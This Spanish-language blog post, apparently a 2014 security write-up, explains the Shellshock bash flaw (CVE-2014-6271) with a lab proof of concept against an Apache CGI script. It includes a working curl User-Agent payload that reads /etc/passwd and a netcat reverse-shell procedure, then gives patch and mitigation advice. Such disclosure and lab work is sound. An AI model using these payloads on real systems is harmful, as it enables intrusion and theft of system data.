Juan Oliva

Una vulnerabilidad explotable de forma remota  ha sido descubierta el dia de ayer (2014-09-24), esta afecta específicamente a bash en Linux. La vulnerabilidad ha sido identificada por  CVE CVE-2014-6271 , también se le ha dado el seudonimo de A.K.A.  Shellshock

Esta vulnerabilidad afecta a casi todas  distribuciones de Linux:

Red Hat Enterprise Linux (versiones 4 a 7) y la distribución Fedora
CentOS (versiones 5 a 7)
Ubuntu 10.04 LTS, 12.04 LTS y 14.04 LTS
Debian

En esta caso vamos a desarrollar una prueba de concepto P.O.C. con un entorno Linux Centos 5.9

1.- Verificar la configuración de CGI por Apache

#vim /etc/httpd/conf/httpd.conf

2.- Agregar nuestro CGI POC Vulnerable

#vim /var/www/cgi-bin/test.cgi

3.- Verificar que el CGI funciona

Ingresamos a la URL :  http://192.168.88.226/cgi-bin/test.cgi

4.- Ahora vamos a explotar la vulnerabilidad desde un Kali Linux

POC Nro 1 :  Volcando Passwd del servidor remoto

#curl -A «() { foo;};echo;/bin/cat /etc/passwd» http://192.168.88.226/cgi-bin/test.cgi

POC Nro 2 : Generando un shell reverso

Para esto he escrito un pequeño script en bash 😀  publicado aquí  : http://pastebin.com/0BQRb1D2

Paso 1 : Abrimos nuestro puerto a la escucha con Netcat (#nc -lp 8080 -vvv)

Paso 2: ejecutamos el script de la siguiente forma :  #./little-shellshock-reverse.sh localhostIP attackhostIP

Volvemos a la terminal donde tenemos a la escucha el puerto con Netcat y veremos que se ha generado nuestra shell reversa

PARCHES Y VECTORES

– Se recomienda desactivar cualquier script CGI

– Es posible que tambien se pueda user como vector el servicio DHCP como se muestra aquí :

https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

– Realizar la actualización urgente ,

Centos y derivados : #yum update -y bash.

Debian y Ubuntu :  #sudo apt-get update && sudo apt-get install –only-upgrade bash